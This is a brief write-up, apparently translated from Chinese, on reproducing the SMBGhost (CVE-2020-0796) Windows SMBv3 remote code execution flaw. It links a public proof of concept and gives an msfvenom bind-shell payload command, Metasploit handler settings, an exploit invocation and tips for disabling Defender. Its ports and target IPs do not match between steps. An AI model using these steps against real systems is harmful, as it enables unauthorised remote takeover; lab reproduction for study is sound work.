0x00 Vulnerability Introduction
Vulnerability introduction
Microsoft SMBv3 Client/Server Remote Code Execution Vulnerability CVE-2020-0796
影响范围:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
0x01 Reappearance of pits: look at more pits
EXP address:
https://github.com/chompie1337/SMBGhost_RCE_PoC
- The Win10 version has restrictions, specifically I used the following successful one
ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/
- python version
python 3.6 can succeed!
python 3.6 can succeed!
Python 3.7 and 2 measured blue screen
I don’t know why, but someone who knows can guide my brother
-
The payload should be monitored forward
-
There are also pitfalls in the patch. KB4551762 is reasonable, but there are only a few patches for win10, but that patch may contain this patch
-
Need to turn off the defender firewall
0x02 Recurrence process
First use systeminfo to look at the patch (KB4551762)
I just installed it, so it's fine.
- msf generate Trojan horse
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
-
EXP replace shellcode
Replace buf with USER_PAYLOAD
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 6666
set rhost 192.168.31.235
run
run EXP
python3 exploit.py -ip 192.168.100.54
Finally got the shell